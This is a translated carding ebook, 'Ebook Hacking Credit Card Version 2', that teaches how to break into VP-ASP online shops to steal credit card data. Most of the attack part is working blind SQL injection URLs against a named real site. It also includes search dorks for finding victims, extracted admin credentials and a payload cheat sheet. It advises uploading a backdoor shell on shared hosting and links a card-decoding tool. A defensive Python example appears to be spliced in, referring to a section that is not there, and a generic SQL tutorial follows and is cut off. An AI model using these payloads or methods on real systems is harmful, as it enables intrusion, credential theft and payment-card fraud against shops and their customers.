
Ebook Hacking Credit Card Version 2, Latest and Final Edition.


Hacking is only about learning and exchanging security skills.
Title: Credit Card Should Stop
======
Author: hieupc
Email: hieupc@gmail.com
Yahoo: hieuitpc@yahoo.com
Website: http://thegioiebook.com

=============================
After finishing version 1, hieupc immediately started thinking about version 2 of the Ebook Hacking Credit Card. This new edition rounds things out and fills the gaps that were left in the old ebook.


The most noteworthy tutorial in this ebook.

Hacking Credit Card: Blind SQL Injection v1 (by Tieuquainho)
There is an article in Ebook Hacking Credit Card version 1 that uses the same technique, but this one is the fullest write-up.

A brief introduction to blind SQL injection:
This is a form of exploitation that relies on an injection flaw in a web application backed by MSSQL; through that flaw we feed in crafted SQL fragments and pull information out of the server's database. Blind SQL injection is a technique of guessing one character at a time. When most of the other SQL hacking techniques have failed, blind injection is where you look for a way past the blockage. The good side always comes with a bad side, however: blind querying takes a great deal of time and effort, because you have to find every single character of the string you want. For example, to find the admin link you have to find each character of the admin-link value stored in the database and join them into one string. Talking too much only confuses you, so let's get on with it; that is easier to understand.

Preparation:
- A web browser: Opera, Mozilla Firefox 1.3 or anything other than Internet Explorer is fine. Do not use Internet Explorer for this (^|^)
- A glass of water and a towel, to wipe your face if it burns and to wipe off the sweat.
Targets:
- All versions of VP-ASP up to and including 5.0 (a shop package with plenty of bugs and plenty of CCs (^|^))
- To find these VP-ASP shops you can use the keywords below in a search on Google, Yahoo or any other search engine.
- Keywords:
+ shopdisplayproducts.asp?id
+ shopaddtocart.asp?catalogid=
- I give only these two keywords because they are the main markers that let a search engine find VP-ASP.


Let's start by hacking a demo site.
Target: hxxps://circleathletics.com/ (running VP-ASP 5.0)
- First we look for the admin link of this site:

hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,1)='a')

Microsoft VBScript runtime error '800a000d'
Type mismatch: 'clng'
/shop/shopproductfeatures.asp, line 139

This means the character we tried (a) is not the first character of the admin link. A moment's thought: the admin link is usually shopadmin.asp, so in the next request we replace a with s:

hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,1)='s')

Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value 'xadminpage' to a column of data type int.
/shop/shop$db.asp, line 409

- So s really is the first character of the admin link. (These two error messages are the whole oracle: when the subquery returns no row, the 1=(...) comparison is against nothing, the page carries on and a later CLng() call in shopproductfeatures.asp fails with the type mismatch; when the subquery does return the 'xadminpage' row, SQL Server has to convert that varchar to int for the comparison and fails, quoting the value it could not convert.) We carry on with the following characters:

hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,2)='sh')

- Note this part: (fieldvalue,2)='sh')
- Keep substituting characters this way until the admin link is complete. The admin link ends in .asp, so there is no need to find out how many characters the string has first.

Next we find the admin user and password:

hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(fldusername,1)='a')

Microsoft VBScript runtime error '800a000d'
Type mismatch: 'clng'
/shop/shopproductfeatures.asp, line 139

Nothing yet, so we keep going the same way:

hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(fldusername,1)='c')

Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value 'circ54' to a column of data type int.
/shop/shop$db.asp, line 409

The whole username shows up at once; this site leaks badly, because the column being selected (fldusername) is the very one being tested, so the conversion error quotes its full value. On other sites you poke around a little, as when finding the admin link, and you will be fine, hihi:

hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(fldusername,2)='ab')

That is how the second character is found; for the third you extend it to (fldusername,3)='abc'), and so on.

We now have the admin user circ54; next we look for its password:

hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fldpassword%20from%20tbluser%20where%20fldusername='circ54'%20and%20left(fldpassword,1)='a')

Microsoft VBScript runtime error '800a000d'
Type mismatch: 'clng'
/shop/shopproductfeatures.asp, line 13

hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fldpassword%20from%20tbluser%20where%20fldusername='circ54'%20and%20left(fldpassword,1)='2')

Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value '2005HCP' to a column of data type int.
/shop/shop$db.asp, line 409

And that is this one hacked, hihi. Too easy, isn't it?

I hope you understand; my writing is clumsy, so please bear with me.

Here is some additional reference material:




**************** Finding the admin link ***********************************

%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,1)='a') <=== guess the first character

%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,1)='a'%20and%20len(fieldvalue)=15) <=== find the number of characters

**************** Finding the user ******************************************

%20or 1=(select fldusername from tbluser where admintype='super' and left(fldusername,1)='a') <== first character

%20or 1=(select fldusername from tbluser where admintype='super' and left(fldusername,2)='ab') <== second character; for the third, change 2 to 3 and keep probing

%20or 1=(select fldusername from tbluser where left(fldusername,1)='b' and len(fldusername)=3) <== number of characters in the username

%20or 1=(select fldusername from tbluser where left(fldusername,1)='a') <== when there is no super admin

**************** Finding the password **************************************

%20or 1=(select fldpassword from tbluser where fldusername='blue42jh' and left(fldpassword,1)='a') <== first character

%20or 1=(select fldpassword from tbluser where left(fldpassword,1)='b' and len(fldpassword)=3) <== number of characters




Hacking the shop's second password
( research by nobita and hieupc )

nobita's article:

First have a look at the code of the login page with two passwords:

<!--#include file="shop$db.asp"-->
<%
const SecondPassword="password2"
const Secondpasswordmsg="Second password does not match"
'**********************************************************************
' Shop administration only VP-ASP Shopping Cart
' Forces user to login
' asked for userid and password
' Goes to shopadmin1.asp
' Version 4.50
' September 7, 2002
'*********************************************************************
SetSess "ShopAdmin",""
SetSess "INIT",""
Dim myconn
Dim rs
Dim username,userpassword
msg=""
dim rc
'on error resume next
If Request("Submit")<>"" Then
shopinit
SetSess "Login","Force"
ShopOpenDatabase myconn
If GetSess("Login")="Force" then
SetSess "Login",""
end if
username=request("Username")
userpassword=request("password")
username=replace(username,"'","")
userpassword=replace(userpassword,"'","")
if ucase(Username)<>"SUPPLIER" then
sql = "select * from tbluser where fldusername='" & username & "' and fldpassword='" & userpassword & "'"
Set rs = myconn.Execute(SQL)
if not rs.eof then
CheckSecondpassword rc
If rc=0 then
GetAdminData rs
else
closerecordset rs
shopclosedatabase myconn
msg=Secondpasswordmsg & "<br>"
end if
else
rs.close
set rs=nothing
LocateSupplier
end if
if msg="" then
msg=LangAdmin01 & "<br>"
end if
Shopclosedatabase myconn
else
msg=LangAdmin01 & "<br>"
Shopclosedatabase myconn
end if
end if
AdminPageHeader
if msg <> "" Then
response.write getconfig("xfont") & msg & "</font>"
end if
%>
<form action="<%=getconfig("xadminpage")%>" method="post" name="LoginForm">
<center><font face=arial size=2
color="#0080C0"><b><%=LangAdmin02%></b></font></center><br>
<TABLE WIDTH=300 BORDER=1 CELLPADDING=3 CELLSPACING=0
align="center" bordercolordark="#333399" bordercolorlight="#666699">
<TR>
<TD BGCOLOR="#0080C0" COLSPAN=2 ALIGN=LEFT VALIGN=TOP>
<font face="Arial, Helvetica" SIZE=2
color=white><B><%=LangAdmin03%></B></FONT></TD>
</TR>
<TR>
<TD WIDTH=50 ALIGN=LEFT VALIGN=Middle><font face="Arial, Helvetica"
SIZE=2><B><%=LangAdminUserName%></B></FONT></TD>
<TD ALIGN=LEFT VALIGN=TOP>
<font face="Arial, Helvetica"><INPUT TYPE=TEXT NAME="UserName"
VALUE="<%=Request("UserName") %>"></font></TD>
</TR>
<TR>
<TD WIDTH=50 ALIGN=LEFT VALIGN=Middle><font face="Arial, Helvetica"
SIZE=2><B><%=LangAdminPassword%></B></FONT></TD>
<TD ALIGN=LEFT VALIGN=TOP><font face="Arial, Helvetica"><INPUT
TYPE=PASSWORD NAME="Password"></font></td></TR>
<%
If Secondpassword<>"" then
%>
<tr>
<TD WIDTH=50 ALIGN=LEFT VALIGN=Middle><font face="Arial, Helvetica"
SIZE=2><B><%=LangAdminPassword & "2"%></B></FONT></TD>
<TD ALIGN=LEFT VALIGN=TOP><font face="Arial, Helvetica"><INPUT
TYPE=PASSWORD NAME="Password2"></font></td></TR>
<%end if %>
<tr>
<td></td>
<td><font face="Arial, Helvetica"><INPUT TYPE=SUBMIT
VALUE="<%=LangAdminLogin%>" name="Submit"></font></TD>
</tr>
</TABLE>
</form>
</center>
</BODY>
</HTML>
<%
Sub GetAdminData (rs)
setsess "shopadmin" ,rs("fldusername")
if isnull(rs("Admintype")) then
SetSess "admintype","SUPER"
else
setsess "admintype",ucase(rs("admintype"))
end if
setsess "login" , rs("fldusername")
setsess "usertables",rs("tablesallowed")
setsess "adminmenus",rs("fldaccess")
rs.close
set rs=nothing
LogUser GetSess("ShopAdmin"), "in", myconn
SetSess("Supplierid"),""
Shopclosedatabase myconn
CheckSecurity (userpassword)
Response.redirect "shopadmin1.asp"
end sub

Sub LocateSupplier
If getconfig("xAllowSupplierlogin")<>"Yes" then exit sub
sql = "select * from suppliers where supplieruserid='" & username & "' and supplierpassword='" & userpassword & "'"
Set rs = myconn.Execute(SQL)
If err.number>0 then
msg="database Open error<br>" & GetSess("Openerror")
else
If Not rs.EOF Then
setsess "shopadmin" ,request("username")
setsess "admintype","supplier"
setsess "login" , rs("supplieruserid")
setsess("supplierid"),rs("supplierid")
rs.close
set rs=nothing
GetUserTables
' setsess "usertables",rs("tablesallowed")
LogUser GetSess("ShopAdmin"), "in", myconn
Shopclosedatabase myconn
response.redirect "shopadmin1.asp"
else
rs.close
set rs=nothing
end if
end if
end sub

Sub GetUserTables
dim rs
sql = "select * from tbluser where fldusername='supplier'"
Set rs = myconn.Execute(SQL)
if err.number>0 then
msg="database Open error<br>" & GetSess("Openerror")
else
If Not rs.EOF Then
setsess "usertables",rs("tablesallowed")
setsess "adminmenus",rs("fldaccess")
end if
end if
rs.close
set rs=nothing
end sub
Sub Checksecurity (ipassword)
dim tpassword
tpassword=ucase(ipassword)
if tpassword="VPASP" or tpassword="ADMIN" then
setsess "security","Yes"
end if
end sub
'*******************************************************************
' if using second password facility, the validate it
'*******************************************************************
Sub CheckSecondPassword(rc)
dim password
rc=4
If secondpassword="" then
rc=0
exit sub
end if
password=request.form("password2")
if password="" then exit sub
if ucase(password)<>ucase(secondpassword) then exit sub
rc=0
end sub
%>



Note the two const lines at the top of the file (SecondPassword and Secondpasswordmsg): that is where the shop's second password is set in VPASP. Earlier nobita had reasoned that this second password had been fixed by VPASP and lived in the shop's database, but that is not right. From the way this second password is set, nobita thinks the second password is something the webmaster edits in himself following VPASP's instructions. The way and the place the password is set can therefore differ, for example:


CODE
<!--#include file="shop$db.asp"-->
<!--#include file="pass2.asp"-->
<%


where the file pass2 holds the second password,

or the path to the second password is placed somewhere in the shop's database, in a table whose contents do not change, for example a separate table created just to hold pass2.
Besides these basic ways of setting pass2, the method can vary with the skill of the webmaster.

Recently, however, some people have claimed to have exploit code for pass2, but in fact it only probes the database for odd tables that are likely to hold the pass2 info, for example:


CODE

affiliates
categories
configuration
coupons
customerprices
customers
dtproperties
gifts
mycompany
oitems
orders
ordertracking
prodcategories
prodfeatures
products
projects
quantitydiscounts
registrant
registryitems
reviews
searchresults
shipmethods
pass_access
suppliers
tblaccess
tbllog
tbluser
CHECK_CONSTRAINTS
COLUMN_DOMAIN_USAGE
COLUMN_PRIVILEGES
COLUMNS
CONSTRAINT_COLUMN_USAGE
CONSTRAINT_TABLE_USAGE
DOMAIN_CONSTRAINTS
DOMAINS
KEY_COLUMN_USAGE
REFERENTIAL_CONSTRAINTS
SCHEMATA
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TABLES
VIEW_COLUMN_USAGE
VIEW_TABLE_USAGE
VIEWS



This way of searching takes a great deal of effort, because you have to find all of its tables, and with the hacking methods in use today that means guessing table names, or blind-extracting each table name character by character. You can sit for a whole day and not get one shop. So far nobita has not found a better approach for this kind either.

Hopefully this article will help you look for pass2 more effectively.
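The login code quoted in nobita's article builds its SQL by concatenation (sql = "select * from tbluser where fldusername='" & username & "' and ...") and protects it only with replace(username,"'",""), while shopaddtocart.asp takes catalogid unquoted, which is why the blind payloads earlier in this ebook need no quote at all. The following is an added example in Python with SQLite, not VP-ASP's code and not from the ebook; the table and column names mirror VP-ASP's schema, the rows are constructed. It puts both vulnerable shapes next to a parameterised version.

```python
"""String-built queries from the VP-ASP login next to a parameterised form.

Added example in Python with SQLite, not VP-ASP's code and not from the ebook.
Table and column names mirror VP-ASP's schema; the rows are constructed.
"""
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE tbluser (fldusername TEXT, fldpassword TEXT, admintype TEXT);
        INSERT INTO tbluser VALUES ('admin1', 'Qz9pL2vt', 'super');  -- constructed
        CREATE TABLE products (catalogid INTEGER, cname TEXT);
        INSERT INTO products VALUES (6, 'Shoes'), (7, 'Socks');        -- constructed
    """)
    return db


def login_vpasp_style(db, username, password):
    """shopadmin.asp: strip single quotes, then concatenate into the SQL."""
    username = username.replace("'", "")
    password = password.replace("'", "")
    sql = ("select * from tbluser where fldusername='" + username +
           "' and fldpassword='" + password + "'")
    return db.execute(sql).fetchone() is not None


def product_vpasp_style(db, catalogid):
    """shopaddtocart.asp: the numeric id goes in unquoted, so the attacker
    needs no quote at all and the quote stripping above would not help."""
    sql = "select cname from products where catalogid=" + catalogid + " order by catalogid"
    return [row[0] for row in db.execute(sql)]


def login_safe(db, username, password):
    """Parameterised: the values never become part of the statement text."""
    sql = "select 1 from tbluser where fldusername=? and fldpassword=?"
    return db.execute(sql, (username, password)).fetchone() is not None


def product_safe(db, catalogid):
    """Parameterised, and the id is validated as an integer first."""
    cid = int(catalogid)  # ValueError for anything that is not a plain number
    sql = "select cname from products where catalogid=? order by catalogid"
    return [row[0] for row in db.execute(sql, (cid,))]


def product_safe_rejects(db, catalogid):
    """True if product_safe refuses the value (shows the fix working)."""
    try:
        product_safe(db, catalogid)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print(login_vpasp_style(db, "admin1' or '1'='1", "x"))   # False: quotes stripped
    print(product_vpasp_style(db, "6 or 1=1"))                # every product, no quote needed
    print(product_safe_rejects(db, "6 or 1=1"))               # True
```

Quote stripping does block the textbook ' or '1'='1 on the login form, but it does nothing for the numeric parameter, and parameters keep the value out of the statement text in both cases; for a numeric id, converting with int() first rejects anything that is not a number. Two further points a reviewer would note: sqlite3's execute() refuses a second statement after a semicolon, whereas SQL Server through ADO runs stacked statements, which is what the ';update ...' deface later in this ebook depends on; and tbluser stores and compares passwords in plaintext, which is why the blind extraction above yields a password that works as-is.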


hieupc's article:

From hieupc's experience, the quickest and shortest way to get a shop's second password (Secure Pass) is a local hack; apart from that, you can follow nobita's article above to obtain pass 2. Local hacking becomes very easy once you have a hosting account in hand: you only need to upload a backdoor such as remview.php and you can hack. It does require solid knowledge of hosting and DNS, though. To find out which server a shop lives on, check its DNS or IP as below, then register yourself a hosting account on the same host as the shop whose pass 2 you want. For how local hacking and DNS checks work, and to learn more about hosting, you can visit the following sites, which have detailed guides: http://viethacker.org , http://hvaonline.net ; for DNS checks and domain information: http://pavietnam.net , http://checkdomain.com , http://whoisc.com , http://check-dns.com . There are many other sites as well; search on google.com.

Remview.php : http://php.spb.ru/remview/remview_2003_10_23.zip

There are also many other shells and backdoors to be found on google.com or through http://viethacker.org


Decoding encrypted CCs: http://rapidshare.de/files/8343810/decodecc.rar.html (unrar password: thegioiebook.com )


Articles you need to read to master the knowledge behind credit card hacking.

- Introduction to SQL.

Source: diendantinhoc.net
~~~~~~~~~~~~~~~~~~~~~~~
SQL is the ANSI standard language for accessing databases.

What is SQL?

SQL stands for Structured Query Language.
SQL lets you access a database.
SQL is an ANSI standard language.
SQL can execute queries against a database.
SQL can retrieve data from a database.
SQL can insert new data into a database.
SQL can delete data from a database.
SQL can modify existing data in a database.
SQL is easy to learn :-)

SQL is a standard

SQL is an ANSI (American National Standards Institute) standard for accessing database systems. SQL statements are used to retrieve and update data in a database.

SQL works with most database programs, such as MS Access, DB2, Informix, MS SQL Server, Oracle, Sybase, etc.

Note: most database programs that support SQL also have their own extensions to SQL that work only with that program.

Database tables

A database usually consists of one or more tables. Each table is identified by a name (for example Customers or Orders). A table holds records (rows), which are the table's data.

Below is an example of a table named Persons:

LastName  | FirstName | Address      | City
Hansen    | Ola       | Timoteivn 10 | Sandnes
Svendson  | Tove      | Borgvn 23    | Sandnes
Pettersen | Kari      | Storgt 20    | Stavanger

The table above contains three records (rows), one per person, and four columns (LastName, FirstName, Address and City).

SQL queries

With SQL we can query the database and get results back through queries.

A query such as:

SELECT LastName FROM Persons

returns:

LastName
Hansen
Svendson
Pettersen

Note: some database systems require SQL statements to end with a semicolon (;). We will not use semicolons in this article.

SQL as a Data Manipulation Language (DML)

SQL has the syntax for executing queries. It also has syntax for updating, inserting and deleting records.

The DML query and update commands of SQL are:

SELECT - retrieve data from a database table.
UPDATE - update/modify data in a table.
DELETE - delete data from a table.
INSERT INTO - add new data to a table.

SQL as a Data Definition Language (DDL)

The DDL part of SQL lets you create or delete tables. You can also define keys and indexes, specify links between tables and set up constraints between the tables of the database.

The most important DDL statements in SQL are:

CREATE TABLE - create a new table.
ALTER TABLE - change the structure of a table.
DROP TABLE - delete a table.
CREATE INDEX - create an index (search key).
DROP INDEX - delete an index.


-The SELECT statement

The SELECT statement is used to retrieve data from a table. The result is returned in table form and stored in a result table (also called the result set).

Syntax

The syntax of SELECT is:

SELECT column_names
FROM table_name

Retrieving several columns

To retrieve the columns LastName and FirstName, use a SELECT statement like this:

SELECT LastName, FirstName FROM Persons

Persons table:

LastName  | FirstName | Address      | City
Hansen    | Ola       | Timoteivn 10 | Sandnes
Svendson  | Tove      | Borgvn 23    | Sandnes
Pettersen | Kari      | Storgt 20    | Stavanger

Result:

LastName  | FirstName
Hansen    | Ola
Svendson  | Tove
Pettersen | Kari

Retrieving all columns

To retrieve all columns from Persons, use * in place of the column list:

SELECT * FROM Persons

Result:

LastName  | FirstName | Address      | City
Hansen    | Ola       | Timoteivn 10 | Sandnes
Svendson  | Tove      | Borgvn 23    | Sandnes
Pettersen | Kari      | Storgt 20    | Stavanger

The result set

The result of an SQL query is stored in a result set. Most database systems let you step through the result set with programming functions such as Move-To-First-Record, Get-Record-Content, Move-To-Next-Record, etc.

Semicolons after statements

The semicolon is the standard way to separate SQL statements when the database system allows several statements to be executed in a single call.

The SQL statements in this article are all single statements (each one is exactly one SQL command). MS Access and MS SQL Server do not require a semicolon after each statement, but some other database programs may force you to add one after every statement (even a single one). Again, we will not use semicolons at the end of SQL statements in this article.
-The WHERE clause

To retrieve data from a table that meets some condition, a WHERE clause can be added to the SELECT statement.

Syntax

The syntax of WHERE in a SELECT statement is:

SELECT column_name FROM table_name
WHERE column_name operator value

The operators that can be used in a WHERE clause are:

Operator | Description
=        | equal
<>       | not equal
>        | greater than
<        | less than
>=       | greater than or equal
<=       | less than or equal
BETWEEN  | within a range
LIKE     | pattern match on a string

Note: in some versions of SQL the <> operator may be written as !=

Using WHERE

To list the people who live in the city of Sandnes, use a WHERE clause in the SELECT statement like this:

SELECT * FROM Persons
WHERE City = 'Sandnes'

Persons table:

LastName  | FirstName | Address      | City      | Year
Hansen    | Ola       | Timoteivn 10 | Sandnes   | 1951
Svendson  | Tove      | Borgvn 23    | Sandnes   | 1978
Svendson  | Stale     | Kaivn 18     | Sandnes   | 1980
Pettersen | Kari      | Storgt 20    | Stavanger | 1960

Result:

LastName  | FirstName | Address      | City    | Year
Hansen    | Ola       | Timoteivn 10 | Sandnes | 1951
Svendson  | Tove      | Borgvn 23    | Sandnes | 1978
Svendson  | Stale     | Kaivn 18     | Sandnes | 1980

-------------------------------------------

-AND and OR

The operators AND and OR join two or more conditions in a WHERE clause.

AND shows a row only if ALL the conditions are met. OR shows a row if ANY of the conditions is met.

Sample table:

LastName | FirstName | Address      | City
Hansen   | Ola       | Timoteivn 10 | Sandnes
Svendson | Tove      | Borgvn 23    | Sandnes
Svendson | Stephen   | Kaivn 18     | Sandnes

Example 1

Use AND to find people whose first name is Tove and whose last name is Svendson:

SELECT * FROM Persons
WHERE FirstName = 'Tove'
AND LastName = 'Svendson'

Result:

LastName | FirstName | Address   | City
Svendson | Tove      | Borgvn 23 | Sandnes

Example 2

Use OR to find people whose first name is Tove or whose last name is Svendson:

SELECT * FROM Persons
WHERE FirstName = 'Tove'
OR LastName = 'Svendson'

Result:

LastName | FirstName | Address   | City
Svendson | Tove      | Borgvn 23 | Sandnes
Svendson | Stephen   | Kaivn 18  | Sandnes

Example 3

You can also combine AND and OR with parentheses to build more complex queries:

SELECT * FROM Persons WHERE
(FirstName = 'Tove' OR FirstName = 'Stephen')
AND LastName = 'Svendson'

Result:

LastName | FirstName | Address   | City
Svendson | Tove      | Borgvn 23 | Sandnes
Svendson | Stephen   | Kaivn 18  | Sandnes




Using quotes

Note that in the example above we put single quotes (') around the condition value 'Sandnes'.

SQL uses single quotes around text values. Many database systems also accept double quotes ("). Numeric values are not quoted.

For text values:

Correct:
SELECT * FROM Persons WHERE FirstName = 'Tove'

Incorrect:
SELECT * FROM Persons WHERE FirstName = Tove

For numeric values:

Correct:
SELECT * FROM Persons WHERE Year > 1965

Incorrect (some engines implicitly convert the string, but do not rely on it):
SELECT * FROM Persons WHERE Year > '1965'

The LIKE operator

LIKE is used to search for a text pattern in a column.

Syntax

The syntax of LIKE is:

SELECT column_name FROM table_name
WHERE column_name LIKE pattern

A % sign can be used to define wildcard characters. % can be placed before and/or after the pattern.

Using LIKE

The following statement returns the people whose first name begins with O:

SELECT * FROM Persons
WHERE FirstName LIKE 'O%'

The following statement returns the people whose first name ends with a:

SELECT * FROM Persons
WHERE FirstName LIKE '%a'

The following statement returns the people whose first name contains la:

SELECT * FROM Persons
WHERE FirstName LIKE '%la%'
The BETWEEN...AND operator

Selects a range of data lying between two values. The values can be numbers, text or dates.

SELECT column_name FROM table_name
WHERE column_name
BETWEEN value_1 AND value_2

Sample table:

LastName  | FirstName | Address      | City
Hansen    | Ola       | Timoteivn 10 | Sandnes
Nordmann  | Anna      | Neset 18     | Sandnes
Pettersen | Kari      | Storgt 20    | Stavanger
Svendson  | Tove      | Borgvn 23    | Sandnes

Example 1

Find everyone whose last name sorts alphabetically between Hansen (included) and Pettersen (excluded):

SELECT * FROM Persons WHERE LastName
BETWEEN 'Hansen' AND 'Pettersen'

Result:

LastName | FirstName | Address      | City
Hansen   | Ola       | Timoteivn 10 | Sandnes
Nordmann | Anna      | Neset 18     | Sandnes

Important note: BETWEEN...AND can give different results on different database systems. On some systems BETWEEN...AND returns only the rows that lie strictly "between" the two values (rows equal to either endpoint are left out). Some systems include both endpoints. Others include the first endpoint but not the second (as in the example above). Standard SQL, and MS SQL Server with it, treats BETWEEN as inclusive at both ends. So check the database you are using before relying on BETWEEN...AND.

Example 2

To find the people whose last name sorts outside the range of example 1, add NOT:

SELECT * FROM Persons WHERE LastName
NOT BETWEEN 'Hansen' AND 'Pettersen'

Result:

LastName  | FirstName | Address   | City
Pettersen | Kari      | Storgt 20 | Stavanger
Svendson  | Tove      | Borgvn 23 | Sandnes

-------------------------------

The DISTINCT keyword

SELECT returns information from the columns of a table. But what if we do not want duplicate values back?

With SQL, we only add the DISTINCT keyword to the SELECT statement:

SELECT DISTINCT column_name FROM table_name

Example: list all the companies in the Orders table

Our Orders table:

Company   | OrderNumber
Sega      | 3412
W3Schools | 2312
Trio      | 4678
W3Schools | 6798

The statement:

SELECT Company FROM Orders

returns:

Company
Sega
W3Schools
Trio
W3Schools

The company W3Schools appears twice in the result, which is sometimes not what we want.

Example: list all the different companies in the Orders table

The statement:

SELECT DISTINCT Company FROM Orders

returns:

Company
Sega
W3Schools
Trio

The company W3Schools now appears only once, which is usually what we want.

--------------------------------

The ORDER BY keyword is used to sort the result.

Sorting rows

The ORDER BY clause

is used to sort the rows.

Example Orders table:

Company   | OrderNumber
Sega      | 3412
ABC Shop  | 5678
W3Schools | 2312
W3Schools | 6798

Example:

To list the companies in alphabetical (ascending) order:

SELECT Company, OrderNumber FROM Orders
ORDER BY Company

Result:

Company   | OrderNumber
ABC Shop  | 5678
Sega      | 3412
W3Schools | 6798
W3Schools | 2312

Example:

To list the companies in alphabetical (ascending) order and their order numbers in ascending numeric order:

SELECT Company, OrderNumber FROM Orders
ORDER BY Company, OrderNumber

Result:

Company   | OrderNumber
ABC Shop  | 5678
Sega      | 3412
W3Schools | 2312
W3Schools | 6798

Example:

To list the companies in descending order:

SELECT Company, OrderNumber FROM Orders
ORDER BY Company DESC

Result:

Company   | OrderNumber
W3Schools | 6798
W3Schools | 2312
Sega      | 3412
ABC Shop  | 5678
--------------------------

The INSERT INTO statement

The INSERT INTO statement is used to insert new rows into a table.

Syntax:

INSERT INTO table_name
VALUES (value_1, value_2,....)

You can also specify which columns/fields to insert data into:

INSERT INTO table_name (column_1, column_2,...)
VALUES (value_1, value_2,....)

Inserting a new row

Given the Persons table:

LastName  | FirstName | Address   | City
Pettersen | Kari      | Storgt 20 | Stavanger

the statement:

INSERT INTO Persons
VALUES ('Hetland', 'Camilla', 'Hagabakka 24', 'Sandnes')

leaves the Persons table as:

LastName  | FirstName | Address      | City
Pettersen | Kari      | Storgt 20    | Stavanger
Hetland   | Camilla   | Hagabakka 24 | Sandnes

Inserting data into specific columns/fields

With the Persons table above, the statement:

INSERT INTO Persons (LastName, Address)
VALUES ('Rasmussen', 'Storgt 67')

gives:

LastName  | FirstName | Address      | City
Pettersen | Kari      | Storgt 20    | Stavanger
Hetland   | Camilla   | Hagabakka 24 | Sandnes
Rasmussen |           | Storgt 67    |

--------------------------
The UPDATE statement

The UPDATE statement is used to update/modify data already in a table.

Syntax:

UPDATE table_name
SET column_name = new_value
WHERE column_name = value

Example: our Person table is:

LastName  | FirstName | Address    | City
Nilsen    | Fred      | Kirkegt 56 | Stavanger
Rasmussen |           | Storgt 67  |

Updating one column in one row

Suppose we want to add a first name for the person whose last name is Rasmussen:

UPDATE Person SET FirstName = 'Nina'
WHERE LastName = 'Rasmussen'

The result is:

LastName  | FirstName | Address    | City
Nilsen    | Fred      | Kirkegt 56 | Stavanger
Rasmussen | Nina      | Storgt 67  |

Updating several columns in one row

Now we want to change the address and the city as well:

UPDATE Person
SET Address = 'Stien 12', City = 'Stavanger'
WHERE LastName = 'Rasmussen'

The result is:

LastName  | FirstName | Address    | City
Nilsen    | Fred      | Kirkegt 56 | Stavanger
Rasmussen | Nina      | Stien 12   | Stavanger

-------------------------

The DELETE statement

is used to delete rows from a table.

Syntax:

DELETE FROM table_name
WHERE column_name = value

Example: our Person table is:

LastName  | FirstName | Address    | City
Nilsen    | Fred      | Kirkegt 56 | Stavanger
Rasmussen | Nina      | Stien 12   | Stavanger

Deleting one row:

We delete the person named Nina Rasmussen:

DELETE FROM Person WHERE LastName = 'Rasmussen'

Result after the delete:

LastName | FirstName | Address    | City
Nilsen   | Fred      | Kirkegt 56 | Stavanger

Deleting all rows:

Sometimes we want to delete all the data in a table while keeping the table itself, with its structure and all its attributes. For that we can use:

DELETE FROM table_name

or

DELETE * FROM table_name

-------------------------
Counting rows: COUNT

SQL has a built-in function for counting rows in a database.

Syntax of COUNT:

SELECT COUNT(column_name) FROM table_name

The COUNT(*) function:

COUNT(*) returns the number of rows selected from the table.

Example Persons table:

Name            | Age
Hansen, Ola     | 34
Svendson, Tove  | 45
Pettersen, Kari | 19

The following statement returns the number of rows in the table:

SELECT COUNT(*) FROM Persons

and the result is:

3

The following statement returns the number of people older than 20:

SELECT COUNT(*) FROM Persons WHERE Age > 20

and the result is:

2

The COUNT(column) function:

COUNT(column) returns the number of rows whose value in the given column is not NULL.

Example Persons table:

Name            | Age
Hansen, Ola     | 34
Svendson, Tove  | 45
Pettersen, Kari |

The following statement returns the number of people whose Age column is not empty:

SELECT COUNT(Age) FROM Persons

and the result is:

2

COUNT DISTINCT

Note: the examples below work with Oracle and MS SQL Server but not with MS Access (not tested on other database systems!)

DISTINCT and COUNT can be combined to count the number of distinct results.

Syntax:

SELECT COUNT(DISTINCT column(s)) FROM table

Example Orders table:

Company   | OrderNumber
Sega      | 3412
W3Schools | 2312
Trio      | 4678
W3Schools | 6798

The statement:

SELECT COUNT(DISTINCT Company) FROM Orders

returns:

3


Advanced SQL

Functions

SQL has quite a few built-in functions for counting and calculating.

Syntax:

A function is called inside an SQL statement like this:

SELECT function(column_name) FROM table_name

The table used in the following examples:

Name            | Age
Hansen, Ola     | 34
Svendson, Tove  | 45
Pettersen, Kari | 19

The AVG(column) function

AVG returns the average of the given column over the selected rows. NULL values are ignored when the average is computed.

Example:

The following statement computes the average age of the people older than 20:

SELECT AVG(Age) FROM Persons WHERE Age > 20

and the result is:

39.5

The MAX(column) function

MAX returns the largest value in the column. NULL values are ignored.

Example:

SELECT MAX(Age) FROM Persons

result:

45

The MIN(column) function

MIN returns the smallest value in the column. NULL values are ignored.

Example:

SELECT MIN(Age) FROM Persons

result:

19

Note: MIN and MAX can also be applied to text columns. The values are then compared in ascending dictionary order.

The SUM(column) function

SUM returns the total of the values in the column. NULL values are ignored.

Example:

Find the total age of everyone in the table:

